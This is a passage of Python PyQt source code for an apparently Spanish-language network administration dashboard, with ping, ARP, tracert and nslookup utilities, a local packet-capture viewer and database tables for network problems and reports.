\"ETHER\" in self.inf.INTERFAZ.upper():\r\n senal=100\r\n pie.append(\"Señal (Alámbrico)\",senal)\r\n pie.append(\"Perdida\",0)\r\n else: \r\n pie.append(\"Señal\",senal)\r\n pie.append(\"Perdida\",100-senal)\r\n else:\r\n pie.append(\"Señal\",0)\r\n pie.append(\"Perdida\",100)\r\n chart =QChart()\r\n if self.inf.TEMA==\"Obscuro\":\r\n enc=[\"\",\"\"]\r\n chart.setBackgroundVisible(False)\r\n else:\r\n enc=[\"\",\"\"]\r\n chart.setBackgroundVisible(True)\r\n chart.createDefaultAxes()\r\n chart.setTitle(enc[0]+\"Señal de la red \"+self.inf.SSID+f\" ({senal}%)\"+enc[1])\r\n chart.addSeries(pie)\r\n chartV = QChartView(chart)\r\n chartV.setRenderHint(QPainter.Antialiasing)\r\n aux=QWidget()\r\n layout=QHBoxLayout()\r\n layout.addWidget(chartV)\r\n aux.setLayout(layout)\r\n self.ui.WidgetSenal.setWidget(aux)\r\n except:\r\n pass\r\n\r\n def actualizarDatosDash(self):\r\n INTER=rs.obtenerDatosInter(self.inf.INTERFAZ)\r\n \r\n self.ui.DatosRed.setText(\r\n f\"\"\"\r\n

Datos de Red Actual
___________________________________________

\r\n

\r\n Nombre Interfaz: {self.inf.INTERFAZ}
\r\n Descripción:
  {INTER[1]}
\r\n SSID: {self.inf.SSID}
\r\n Tipo de radio: {INTER[3]}
\r\n Banda: {INTER[4]}
\r\n Velocidad de Transmision: {INTER[5]} Mbps
\r\n Velocidad de Recepción: {INTER[6]} Mbps
\r\n Señal: {INTER[7]}
\r\n Dirección IPv4: {self.inf.getIPV4()}
\r\n Puerta de Enlace: {self.inf.GATEWAY}
\r\n Sub-Máscara de red: {self.inf.MASCARA}
\r\n

\r\n \"\"\"\r\n )\r\n\r\n def Gestion(self):\r\n self.BorrarFormatos()\r\n self.formato(self.ui.GestionBtn)\r\n self.ui.Contenidos.setCurrentWidget(self.ui.pGest) \r\n self.ui.SalidaGestion.resizeRowsToContents()\r\n for i in range(0,self.ui.SalidaGestion.columnCount()):\r\n self.ui.SalidaGestion.setColumnWidth(i,self.ui.SalidaGestion.width()/self.ui.SalidaGestion.columnCount())\r\n def Reportes(self):\r\n self.BorrarFormatos()\r\n self.formato(self.ui.RerportesBtn)\r\n self.ui.Contenidos.setCurrentWidget(self.ui.pReport)\r\n def Trafico(self):\r\n self.BorrarFormatos()\r\n self.formato(self.ui.TraficoBtn)\r\n self.ui.Contenidos.setCurrentWidget(self.ui.pTraf)\r\n self.ui.TablaPaquetes.resizeRowsToContents()\r\n for i in range(0,self.ui.TablaPaquetes.columnCount()): self.ui.TablaPaquetes.setColumnWidth(i,self.ui.TablaPaquetes.width()/self.ui.TablaPaquetes.columnCount())\r\n def Utilidades(self):\r\n self.BorrarFormatos()\r\n self.formato(self.ui.UtilidadesBtn)\r\n self.ui.Contenidos.setCurrentWidget(self.ui.pUtil) \r\n \r\n def IPCONFIG(self):\r\n self.BorrarFormatos2()\r\n self.formato(self.ui.IPConfBtn)\r\n self.ui.ContenidosU.setCurrentWidget(self.ui.IPConfigPag) \r\n def PING(self):\r\n self.BorrarFormatos2()\r\n self.formato(self.ui.PingBtn)\r\n self.ui.ContenidosU.setCurrentWidget(self.ui.PingPag) \r\n self.ui.PINGOUT.resizeRowsToContents()\r\n for i in range(0,self.ui.PINGOUT.columnCount()): self.ui.PINGOUT.setColumnWidth(i,self.ui.PINGOUT.width()/self.ui.PINGOUT.columnCount())\r\n def TRACERT(self):\r\n self.BorrarFormatos2()\r\n self.formato(self.ui.TracerBtn)\r\n self.ui.ContenidosU.setCurrentWidget(self.ui.TracertPag) \r\n def ARP(self):\r\n self.BorrarFormatos2()\r\n self.formato(self.ui.ArpBtn)\r\n dis=rs.Obtener_Dispositivos(True)\r\n self.ui.BarDis.clear()\r\n for i in dis:\r\n if i[5] != '--' and i[3]!='127.0.0.1':\r\n self.ui.BarDis.addItem(i[0]+\":\"+i[3])\r\n self.ui.ContenidosU.setCurrentWidget(self.ui.ARPPag) \r\n def ROUTE(self):\r\n self.BorrarFormatos2()\r\n self.formato(self.ui.RouteBtn)\r\n self.ui.ContenidosU.setCurrentWidget(self.ui.RoutePag) \r\n def NS(self):\r\n self.BorrarFormatos2()\r\n self.formato(self.ui.NSLookBtn)\r\n self.ui.ContenidosU.setCurrentWidget(self.ui.NSPag) \r\n def BorrarFormatos(self):\r\n u=self.ui\r\n if self.inf.TEMA==\"Obscuro\":\r\n style=\"QPushButton{text-align:left;\tpadding:5px 10px;\tborder-top-left-radius: 10px;\tborder-bottom-left-radius: 10px;} QPushButton::hover{background-color:#1f232a;}QPushButton::pressed{background-color:#343b47;}\"\r\n else:\r\n style=\"QPushButton{text-align:left;\tpadding:5px 10px;\tborder-top-left-radius: 10px;\tborder-bottom-left-radius: 10px;} \"\r\n u.DashboardBtn.setStyleSheet(style)\r\n u.GestionBtn.setStyleSheet(style)\r\n u.RerportesBtn.setStyleSheet(style)\r\n u.TraficoBtn.setStyleSheet(style)\r\n u.UtilidadesBtn.setStyleSheet(style)\r\n u.VelocidadBtn.setStyleSheet(style)\r\n def BorrarFormatos2(self):\r\n u=self.ui\r\n if self.inf.TEMA==\"Obscuro\":\r\n style=\"QPushButton:hover{background-color:#1f232a;}QPushButton:pressed{\tbackground-color:#343b47;}\"\r\n else:\r\n style=\"QPushButton:hover{background-color:#909090;}\"\r\n u.IPConfBtn.setStyleSheet(style)\r\n u.PingBtn.setStyleSheet(style)\r\n u.ArpBtn.setStyleSheet(style)\r\n u.TracerBtn.setStyleSheet(style)\r\n u.RouteBtn.setStyleSheet(style)\r\n u.IPConfBtn.setStyleSheet(style)\r\n u.NSLookBtn.setStyleSheet(style)\r\n def formato(self,boton):\r\n if self.inf.TEMA==\"Obscuro\":\r\n style=\"QPushButton{background-color:#1f132a;} 
QPushButton::hover{background-color:#1f232a;}QPushButton::pressed{background-color:#343b47;}\"\r\n else:\r\n style=\"border: 1px solid;border-color:#D8D8D8;\"\r\n\r\n boton.setStyleSheet(style)\r\n ping=\"\"\r\n procPing=False\r\n def utilidadPingIniciar(self):\r\n if self.procPing==False:\r\n self.procPing=True\r\n self.ui.PingIniciarBtn.setStyleSheet(\"border-radius:10px;background-color: #20945e;\tpadding: 8px 8px;\")\r\n self.ping=\"\"\r\n busqueda = Thread(target=self.utilidadPingIniciarH)\r\n busqueda.start()\r\n else:\r\n self.procPing=False\r\n registros=0\r\n tmpBytes=\"\"\r\n\r\n def putPing(self):\r\n if \"[!]\" in self.ping:\r\n self.ping=self.ping.replace(\"\\n\",\"
\")\r\n self.ui.label_35.setText(f\"{self.ping}\")\r\n else:\r\n valores=self.ping.split(\" \")\r\n self.ui.label_35.setText(f\"Haciendo ping a {valores[1]}\")\r\n valores[6]=valores[6].replace(\"tiempo<\",\"tiempo=<\")\r\n self.ui.PINGOUT.insertRow(self.registros)\r\n self.ui.PINGOUT.setItem(self.registros,0,QTableWidgetItem(valores[0]))\r\n self.ui.PINGOUT.setItem(self.registros,1,QTableWidgetItem(valores[1]))\r\n if \"inaccesible\" in self.ping:\r\n self.ui.PINGOUT.setItem(self.registros,3,QTableWidgetItem(\"Inaccesible\"))\r\n self.ui.PINGOUT.setItem(self.registros,4,QTableWidgetItem(\"Inaccesible\"))\r\n self.ui.PINGOUT.setItem(self.registros,2,QTableWidgetItem(\"Inaccesible\"))\r\n elif \"agotado\" in self.ping:\r\n self.ui.PINGOUT.setItem(self.registros,2,QTableWidgetItem(\"Agotado\"))\r\n self.ui.PINGOUT.setItem(self.registros,3,QTableWidgetItem(\"Agotado\"))\r\n self.ui.PINGOUT.setItem(self.registros,4,QTableWidgetItem(\"Agotado\"))\r\n else:\r\n if \"bytes=\" in self.ping:\r\n self.ui.PINGOUT.setItem(self.registros,2,QTableWidgetItem(valores[5].replace(\"bytes=\",\"\")))\r\n self.ui.PINGOUT.setItem(self.registros,3,QTableWidgetItem(valores[6].replace(\"tiempo=\",\"\")))\r\n self.ui.PINGOUT.setItem(self.registros,4,QTableWidgetItem(valores[7].replace(\"TTL=\",\"\")))\r\n else:\r\n self.ui.PINGOUT.setItem(self.registros,2,QTableWidgetItem(self.tmpBytes))\r\n self.ui.PINGOUT.setItem(self.registros,3,QTableWidgetItem(valores[5].replace(\"tiempo=\",\"\")))\r\n self.ui.PINGOUT.setItem(self.registros,4,QTableWidgetItem(\"64\"))\r\n self.registros+=1\r\n def utilidadPingIniciarH(self):\r\n print(\"UTILIDAD: INICIAR PING\")\r\n self.registros=0\r\n self.tmpBytes=self.ui.ping3.text()\r\n self.ui.PINGOUT.clearContents()\r\n a= self.ui.PINGOUT.rowCount()\r\n for i in range(0,a): self.ui.PINGOUT.removeRow(i)\r\n util.utilidad_Ping(self.ui.ping1.toPlainText(),self.ui.ping12.text(),self.ui.ping2.text(),self.tmpBytes,self.ui.ping4.text(),self)\r\n if self.inf.TEMA==\"Obscuro\":\r\n self.ui.PingIniciarBtn.setStyleSheet(\"border-radius:10px;background-color: #16191d;\tpadding: 8px 8px;\")\r\n else:\r\n self.ui.PingIniciarBtn.setStyleSheet(\"border-radius:10px;background-color: #D8D8D8;\tpadding: 8px 8px;\")\r\n\r\n def utilidadPingAyuda(self):\r\n var=util.help_ping()\r\n var=var.replace(\"Opci¢n incorrecta --help.\",\"\")\r\n var=var.replace(\"\\n\",\"
\")\r\n var=var.replace(\"\\t\",\"    \")\r\n var=var.replace(\"ú\",\"u\")\r\n if self.inf.TEMA==\"Obscuro\":\r\n self.ui.label_35.setText(f\"{var}\")\r\n else:\r\n self.ui.label_35.setText(f\"{var}\")\r\n def IPCMANUAL(self):\r\n util.IPCMANUAL(self.ui.ParamIp.toPlainText(),self.ui.SalidaIPConf)\r\n def IPCAll(self):\r\n util.IPCAll(self.ui.SalidaIPConf)\r\n def IPCDDNS(self):\r\n util.IPCDDNS(self.ui.SalidaIPConf)\r\n def IPCFDNS(self):\r\n util.IPCFDNS(self.ui.SalidaIPConf)\r\n def IPCRDNS(self):\r\n util.IPCRDNS(self.ui.SalidaIPConf)\r\n def IPCAYUDA(self):\r\n util.IPCAYUDA(self.ui.SalidaIPConf)\r\n def ARPA(self):\r\n util.ARPA(self.ui.SalidaARP)\r\n def ARPC(self):\r\n util.ARPC(self.ui.arp6.text(), self.ui.SalidaARP,self.inf.INTERFAZ)\r\n def ARPADD(self):\r\n util.ARPADD(self.ui.arp4.text(),self.ui.arp3.text(),self.ui.BarDis.itemText(self.ui.BarDis.currentIndex()).split(\":\")[1],self.ui.SalidaARP)\r\n def ARPAY(self):\r\n util.ARPAY(self.ui.SalidaARP)\r\n def ARPR(self):\r\n util.ARPR(self.ui.arp8.text(),self.ui.BarDis.itemText(self.ui.BarDis.currentIndex()).split(\":\")[1],self.ui.SalidaARP)\r\n def NSLOI(self):\r\n util.NSLOI(self.ui.nslo1.text(),self.ui.nslo2.text(),self.ui.textEdit)\r\n def NSLOA(self):\r\n util.NSLOA(self.ui.textEdit)\r\n def tracertA(self):\r\n util.tracertA(self.ui.SalidaTracert)\r\n def tracertI(self):\r\n util.tracertI(self.ui.tracert0.text(),self.ui.tracert1.text(),self.ui.tracert2.text(),self.ui.tracert3.text(),self.ui.tracert4.isChecked(),self.ui.tracert5.isChecked(),self.ui.SalidaTracert)\r\n procesoT=False\r\n def trafico(self):\r\n if self.TrafObj.Cerrar==False:\r\n a= self.ui.TablaPaquetes.rowCount()\r\n self.paquetes=1\r\n for i in range(1,a): self.ui.TablaPaquetes.removeRow(i)\r\n self.ui.TablaPaquetes.clearContents()\r\n self.TrafObj.Cerrar=True\r\n self.ui.InicioTraficoBtn.setStyleSheet(\"border-radius:10px;background-color: #20945e;\tpadding: 8px 8px;\")\r\n hilotrafico=Thread(target=self.captura)\r\n hilotrafico.start()\r\n else:\r\n self.TrafObj.Cerrar=False\r\n if self.inf.TEMA==\"Obscuro\":\r\n self.ui.InicioTraficoBtn.setStyleSheet(\"border-radius:10px;background-color: #16191d;\tpadding: 8px 8px;\")\r\n else:\r\n self.ui.InicioTraficoBtn.setStyleSheet(\"background-color:#D8D8D8;border-radius:10px;padding: 8px 8px;\")\r\n def captura(self):\r\n rs.monitor(self.inf.INTERFAZ,self.signalTrafico,self.TrafObj,self.inf)\r\n paquetes=1\r\n SalidaPaq=False\r\n def dominios(self):\r\n if self.SalidaPaq==False:\r\n self.ui.TituloSalidaPaq.setText(\"Dominios capturados\")\r\n self.animacion_Vertical_Inicio(0,200,500,self.ui.SalidaPaq)\r\n texto=\"\"\r\n with open('modulos/BasesDatos/Dominios.txt', \"r\",encoding=\"utf-8\") as archivo_lectura:\r\n for linea in archivo_lectura:\r\n texto+=linea+\"
\"\r\n self.ui.TextoSalidaPaq.setHtml(texto)\r\n self.SalidaPaq=True\r\n else:\r\n self.SalidaPaq=False\r\n self.animacion_Vertical_Fin(0,200,500,self.ui.SalidaPaq)\r\n def salirPaq(self):\r\n self.SalidaPaq=False\r\n self.animacion_Vertical_Fin(0,200,500,self.ui.SalidaPaq)\r\n def Doubleclick(self):\r\n self.ui.TituloSalidaPaq.setText(\"Información del Paquete\")\r\n for idx in self.ui.TablaPaquetes.selectionModel().selectedIndexes():\r\n row_number = idx.row()\r\n file=open('modulos/BasesDatos/sniff.pcap','r',encoding='utf-8')\r\n contenido=file.readlines()[int(self.ui.TablaPaquetes.item(row_number,0).text())]\r\n if self.SalidaPaq==False:\r\n self.animacion_Vertical_Inicio(0,200,500,self.ui.SalidaPaq)\r\n self.SalidaPaq=True\r\n self.ui.TextoSalidaPaq.setHtml(rs.formatoPaquete(contenido))\r\n else:\r\n self.ui.TextoSalidaPaq.setHtml(rs.formatoPaquete(contenido))\r\n file.close()\r\n FiltrarP=\"\"\r\n \r\n def FiltrarPaquete(self):\r\n self.paquetes=0\r\n self.FiltrarP=self.ui.Filtrado.text()\r\n if self.FiltrarP.replace(\" \",\"\")==\"\":\r\n for i in range(0,self.ui.TablaPaquetes.rowCount()): self.ui.TablaPaquetes.removeRow(i)\r\n self.ui.TablaPaquetes.setRowCount(0)\r\n with open(\"modulos/BasesDatos/sniff.pcap\", \"r\",encoding=\"utf-8\") as archivo_lectura:\r\n for linea in archivo_lectura:\r\n aux=rs.get_data(str(linea))\r\n self.ui.TablaPaquetes.insertRow(self.paquetes)\r\n self.ui.TablaPaquetes.setItem(self.paquetes,0,QTableWidgetItem(str(aux[0])))\r\n protocolo=QTableWidgetItem(aux[2])\r\n protocolo.setForeground(QColor(255, 255, 255))\r\n if str(aux[2]) == \"TCP\": \r\n protocolo.setBackground(QColor(86, 82, 100))\r\n elif str(aux[2]) == \"UDP\": protocolo.setBackground(QColor(83, 153, 176))\r\n elif str(aux[2]) == \"ICMP\": protocolo.setBackground(QColor(21, 52, 80))\r\n elif str(aux[2]) == \"ARP\": protocolo.setBackground(QColor(41, 64, 82))\r\n elif str(aux[2]) == \"DNS\": protocolo.setBackground(QColor(105, 162, 151))\r\n else: protocolo.setBackground(QColor(80, 128, 142))\r\n\r\n self.ui.TablaPaquetes.setItem(self.paquetes,0,QTableWidgetItem(aux[0]))\r\n self.ui.TablaPaquetes.setItem(self.paquetes,1,QTableWidgetItem(str(aux[1])))\r\n self.ui.TablaPaquetes.setItem(self.paquetes,2,protocolo)\r\n self.ui.TablaPaquetes.setItem(self.paquetes,3,QTableWidgetItem(str(aux[3])))\r\n self.ui.TablaPaquetes.setItem(self.paquetes,4,QTableWidgetItem(str(aux[4])))\r\n self.ui.TablaPaquetes.setItem(self.paquetes,5,QTableWidgetItem(str(aux[5])))\r\n self.ui.TablaPaquetes.setItem(self.paquetes,6,QTableWidgetItem(str(aux[6])))\r\n self.paquetes+=1\r\n else:\r\n for i in range(0,self.ui.TablaPaquetes.rowCount()): self.ui.TablaPaquetes.removeRow(i)\r\n self.ui.TablaPaquetes.setRowCount(0)\r\n with open(\"modulos/BasesDatos/sniff.pcap\", \"r\",encoding=\"utf-8\") as archivo_lectura:\r\n for linea in archivo_lectura:\r\n if self.FiltrarP.upper() in linea.upper():\r\n aux=rs.get_data(str(linea))\r\n self.ui.TablaPaquetes.insertRow(self.paquetes)\r\n protocolo=QTableWidgetItem(aux[2])\r\n protocolo.setForeground(QColor(255, 255, 255))\r\n if str(aux[2]) == \"TCP\": protocolo.setBackground(QColor(86, 82, 100))\r\n elif str(aux[2]) == \"UDP\": protocolo.setBackground(QColor(83, 153, 176))\r\n elif str(aux[2]) == \"ICMP\": protocolo.setBackground(QColor(21, 52, 80))\r\n elif str(aux[2]) == \"ARP\": protocolo.setBackground(QColor(41, 64, 82))\r\n elif str(aux[2]) == \"DNS\": protocolo.setBackground(QColor(105, 162, 151))\r\n else: protocolo.setBackground(QColor(80, 128, 142))\r\n\r\n 
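# Copy the seven fields parsed from the capture line into the freshly inserted table row.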
self.ui.TablaPaquetes.setItem(self.paquetes,0,QTableWidgetItem(str(aux[0])))\r\n self.ui.TablaPaquetes.setItem(self.paquetes,1,QTableWidgetItem(str(aux[1])))\r\n self.ui.TablaPaquetes.setItem(self.paquetes,2,protocolo)\r\n self.ui.TablaPaquetes.setItem(self.paquetes,3,QTableWidgetItem(str(aux[3])))\r\n self.ui.TablaPaquetes.setItem(self.paquetes,4,QTableWidgetItem(str(aux[4])))\r\n self.ui.TablaPaquetes.setItem(self.paquetes,5,QTableWidgetItem(str(aux[5])))\r\n self.ui.TablaPaquetes.setItem(self.paquetes,6,QTableWidgetItem(str(aux[6])))\r\n self.paquetes+=1\r\n def BorrarTabla(self):\r\n self.TrafObj.borrar=True\r\n a= self.ui.TablaPaquetes.rowCount()\r\n self.paquetes=1\r\n for i in range(1,a): self.ui.TablaPaquetes.removeRow(i)\r\n self.ui.TablaPaquetes.clearContents()\r\n Salida=open('modulos/BasesDatos/sniff.pcap',\"w\",encoding=\"utf-8\")\r\n Salida.close()\r\n indicador=\"PR\"\r\n indicadorV=\"\"\r\n def DBBorrarFormatos(self):\r\n u=self.ui\r\n if self.inf.TEMA==\"Obscuro\":\r\n style=\"QPushButton{text-align:center; border-top-left-radius: 10px;} QPushButton::hover{background-color:#1f232a;}QPushButton::pressed{background-color:#343b47;}\"\r\n else:\r\n style=\"QPushButton{text-align:center; border-top-left-radius: 10px;}QPushButton::hover{background-color:#D8D8D8;}\"\r\n u.G_PR.setStyleSheet(style)\r\n u.G_R.setStyleSheet(style)\r\n u.G_I.setStyleSheet(style)\r\n u.G_P.setStyleSheet(style)\r\n u.G_RD.setStyleSheet(style)\r\n u.G_C.setStyleSheet(style)\r\n u.G_H.setStyleSheet(style)\r\n u.G_CR.setStyleSheet(style)\r\n u.G_SU.setStyleSheet(style)\r\n u.G_D.setStyleSheet(style)\r\n def seccionadoDB(self,boton,ind):\r\n self.DBBorrarFormatos()\r\n self.formato(boton)\r\n self.indicador=ind\r\n self.DBcerrarMenuAct()\r\n Filtrado=\"*_*_*\"\r\n Filtrado2=\"*_*_*\"\r\n def FiltrarSpeed(self):\r\n aux=self.ui.FiltradoSpeed.text()\r\n if aux==\" \" or aux==\"\\t\":\r\n self.Filtrado2=\"*_*_*\"\r\n else:\r\n self.Filtrado2=aux\r\n self.DBPruebas()\r\n def agregarF(self,tabla,aux,num):\r\n reg=0\r\n if self.Filtrado==\"*_*_*\":\r\n for i in aux:\r\n tabla.insertRow(reg)\r\n for a in range(0,num):\r\n if \"BIEN\" in str(i[a]).upper():\r\n formato=QTableWidgetItem(str(i[a]))\r\n formato.setForeground(QColor(255, 255, 255))\r\n formato.setBackground(QColor(114, 110, 255))\r\n tabla.setItem(reg,a,formato)\r\n elif \"REGULAR\" in str(i[a]).upper() or \"NO VERIFICADO\" in str(i[a]).upper():\r\n formato=QTableWidgetItem(str(i[a]))\r\n formato.setForeground(QColor(255, 255, 255))\r\n formato.setBackground(QColor(255, 103, 50))\r\n tabla.setItem(reg,a,formato)\r\n elif \"MAL\" in str(i[a]).upper() or \"NO CORREGIDO\" in str(i[a]).upper() or \"NO PERMITIDO\" in str(i[a]).upper():\r\n formato=QTableWidgetItem(str(i[a]))\r\n formato.setForeground(QColor(255, 255, 255))\r\n formato.setBackground(QColor(255, 79, 97))\r\n tabla.setItem(reg,a,formato)\r\n elif \"CORRECTO\" in str(i[a]).upper() or \"CORREGIDO\" in str(i[a]).upper() or \"LIBRE\" in str(i[a]).upper() or \"EXCELENTE\" in str(i[a]).upper() or \"VERIFICADO\" in str(i[a]).upper():\r\n formato=QTableWidgetItem(str(i[a]))\r\n formato.setForeground(QColor(255, 255, 255))\r\n formato.setBackground(QColor(67, 144, 67))\r\n tabla.setItem(reg,a,formato)\r\n else:\r\n tabla.setItem(reg,a,QTableWidgetItem(str(i[a])))\r\n reg+=1\r\n else:\r\n for i in aux:\r\n if self.filtradoV(self.Filtrado.upper(),str(i).upper())==True:\r\n tabla.insertRow(reg)\r\n for a in range(0,num):\r\n if \"BIEN\" in str(i[a]).upper():\r\n formato=QTableWidgetItem(str(i[a]))\r\n 
formato.setForeground(QColor(255, 255, 255))\r\n formato.setBackground(QColor(114, 110, 255))\r\n tabla.setItem(reg,a,formato)\r\n elif \"REGULAR\" in str(i[a]).upper() or \"NO VERIFICADO\" in str(i[a]).upper():\r\n formato=QTableWidgetItem(str(i[a]))\r\n formato.setForeground(QColor(255, 255, 255))\r\n formato.setBackground(QColor(255, 103, 50))\r\n tabla.setItem(reg,a,formato)\r\n elif \"MAL\" in str(i[a]).upper() or \"NO CORREGIDO\" in str(i[a]).upper() or \"NO PERMITIDO\" in str(i[a]).upper():\r\n formato=QTableWidgetItem(str(i[a]))\r\n formato.setForeground(QColor(255, 255, 255))\r\n formato.setBackground(QColor(255, 79, 97))\r\n tabla.setItem(reg,a,formato)\r\n elif \"CORRECTO\" in str(i[a]).upper() or \"CORREGIDO\" in str(i[a]).upper() or \"LIBRE\" in str(i[a]).upper() or \"EXCELENTE\" in str(i[a]).upper() or \"VERIFICADO\" in str(i[a]).upper():\r\n formato=QTableWidgetItem(str(i[a]))\r\n formato.setForeground(QColor(255, 255, 255))\r\n formato.setBackground(QColor(67, 144, 67))\r\n tabla.setItem(reg,a,formato)\r\n else:\r\n tabla.setItem(reg,a,QTableWidgetItem(str(i[a])))\r\n reg+=1\r\n tabla.resizeRowsToContents()\r\n for i in range(0,tabla.columnCount()):\r\n tabla.setColumnWidth(i,tabla.width()/tabla.columnCount())\r\n\r\n def agregarFS(self,tabla,aux,num):\r\n reg=0\r\n if self.Filtrado2==\"*_*_*\":\r\n for i in aux:\r\n tabla.insertRow(reg)\r\n for a in range(0,num):\r\n if \"BIEN\" in str(i[a]).upper() or \"BUENO\" in str(i[a]).upper():\r\n formato=QTableWidgetItem(str(i[a]))\r\n formato.setForeground(QColor(255, 255, 255))\r\n formato.setBackground(QColor(114, 110, 255))\r\n tabla.setItem(reg,a,formato)\r\n elif \"REGULAR\" in str(i[a]).upper() or \"NO VERIFICADO\" in str(i[a]).upper():\r\n formato=QTableWidgetItem(str(i[a]))\r\n formato.setForeground(QColor(255, 255, 255))\r\n formato.setBackground(QColor(255, 103, 50))\r\n tabla.setItem(reg,a,formato)\r\n elif \"MAL\" in str(i[a]).upper() or \"NO CORREGIDO\" in str(i[a]).upper() or \"NO PERMITIDO\" in str(i[a]).upper():\r\n formato=QTableWidgetItem(str(i[a]))\r\n formato.setForeground(QColor(255, 255, 255))\r\n formato.setBackground(QColor(255, 79, 97))\r\n tabla.setItem(reg,a,formato)\r\n elif \"CORRECTO\" in str(i[a]).upper() or \"CORREGIDO\" in str(i[a]).upper() or \"LIBRE\" in str(i[a]).upper() or \"EXCELENTE\" in str(i[a]).upper() or \"VERIFICADO\" in str(i[a]).upper():\r\n formato=QTableWidgetItem(str(i[a]))\r\n formato.setBackground(QColor(67, 144, 67))\r\n formato.setForeground(QColor(255, 255, 255))\r\n tabla.setItem(reg,a,formato)\r\n else:\r\n tabla.setItem(reg,a,QTableWidgetItem(str(i[a])))\r\n reg+=1\r\n else:\r\n for i in aux:\r\n if self.filtradoV(self.Filtrado2.upper(),str(i).upper())==True:\r\n tabla.insertRow(reg)\r\n for a in range(0,num):\r\n if \"BIEN\" in str(i[a]).upper() or \"BUENO\" in str(i[a]).upper():\r\n formato=QTableWidgetItem(str(i[a]))\r\n formato.setForeground(QColor(255, 255, 255))\r\n formato.setBackground(QColor(114, 110, 255))\r\n tabla.setItem(reg,a,formato)\r\n elif \"REGULAR\" in str(i[a]).upper() or \"NO VERIFICADO\" in str(i[a]).upper():\r\n formato=QTableWidgetItem(str(i[a]))\r\n formato.setForeground(QColor(255, 255, 255))\r\n formato.setBackground(QColor(255, 103, 50))\r\n tabla.setItem(reg,a,formato)\r\n elif \"MAL\" in str(i[a]).upper() or \"NO CORREGIDO\" in str(i[a]).upper() or \"NO PERMITIDO\" in str(i[a]).upper():\r\n formato=QTableWidgetItem(str(i[a]))\r\n formato.setForeground(QColor(255, 255, 255))\r\n formato.setBackground(QColor(255, 79, 97))\r\n 
tabla.setItem(reg,a,formato)\r\n elif \"CORRECTO\" in str(i[a]).upper() or \"CORREGIDO\" in str(i[a]).upper() or \"LIBRE\" in str(i[a]).upper() or \"EXCELENTE\" in str(i[a]).upper() or \"VERIFICADO\" in str(i[a]).upper():\r\n formato=QTableWidgetItem(str(i[a]))\r\n formato.setBackground(QColor(67, 144, 67))\r\n formato.setForeground(QColor(255, 255, 255))\r\n tabla.setItem(reg,a,formato)\r\n else:\r\n tabla.setItem(reg,a,QTableWidgetItem(str(i[a])))\r\n reg+=1\r\n tabla.resizeRowsToContents()\r\n for i in range(0,tabla.columnCount()):\r\n tabla.setColumnWidth(i,tabla.width()/tabla.columnCount())\r\n def filtradoV(self,filtrado,valor):\r\n if \"|\" in filtrado:\r\n aux=filtrado.split(\"|\")\r\n for i in aux:\r\n if i in valor:\r\n return True\r\n if \"&\" in filtrado:\r\n aux=filtrado.split(\"&\")\r\n encontrado=0\r\n for i in aux:\r\n if i in valor:\r\n encontrado+=1\r\n if len(aux)==encontrado:\r\n return True\r\n if \"|\" not in filtrado and \"&\" not in filtrado:\r\n if filtrado in valor:\r\n return True\r\n return False\r\n def DBproblemasRed(self):\r\n self.seccionadoDB(self.ui.G_PR,\"PR\")\r\n dep=db.consultarDEPARTAMENTOS()\r\n self.ui.PR_DEP.clear()\r\n for i in dep: self.ui.PR_DEP.addItem(str(i[0])+\":\"+i[1])\r\n dep=db.consultarRED()\r\n self.ui.PR_RED.clear()\r\n for i in dep: self.ui.PR_RED.addItem(str(i[0])+\":\"+i[1])\r\n self.borrarTabla()\r\n for i in range(0,8): self.ui.SalidaGestion.insertColumn(i)\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(0,QTableWidgetItem(\"ID\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(1,QTableWidgetItem(\"Descripción\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(2,QTableWidgetItem(\"Fecha\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(3,QTableWidgetItem(\"Solución\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(4,QTableWidgetItem(\"Corregido\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(5,QTableWidgetItem(\"Fecha correxión\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(6,QTableWidgetItem(\"Red\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(7,QTableWidgetItem(\"Departamento\"))\r\n aux = db.consultarPROBLEMAS_RED()\r\n self.agregarF(self.ui.SalidaGestion,aux,8)\r\n \r\n def DBreportes(self):\r\n self.seccionadoDB(self.ui.G_R,\"R\")\r\n self.borrarTabla()\r\n dep=db.consultarPROVEEDOR()\r\n self.ui.R_PROV.clear()\r\n for i in dep: self.ui.R_PROV.addItem(str(i[0])+\":\"+i[1])\r\n for i in range(0,10): self.ui.SalidaGestion.insertColumn(i)\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(0,QTableWidgetItem(\"ID\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(1,QTableWidgetItem(\"Folio\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(2,QTableWidgetItem(\"Descripción\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(3,QTableWidgetItem(\"Fecha\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(4,QTableWidgetItem(\"Acudio\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(5,QTableWidgetItem(\"Remoto / Sitio\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(6,QTableWidgetItem(\"Motivo\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(7,QTableWidgetItem(\"Telefono\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(8,QTableWidgetItem(\"Atendio\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(9,QTableWidgetItem(\"Proveedor\"))\r\n aux = db.consultarREPORTES()\r\n self.agregarF(self.ui.SalidaGestion,aux,10)\r\n\r\n\r\n def DBinvernario(self):\r\n self.seccionadoDB(self.ui.G_I,\"I\")\r\n dep=db.consultarDEPARTAMENTOS()\r\n self.ui.I_DEP.clear()\r\n for i in dep: 
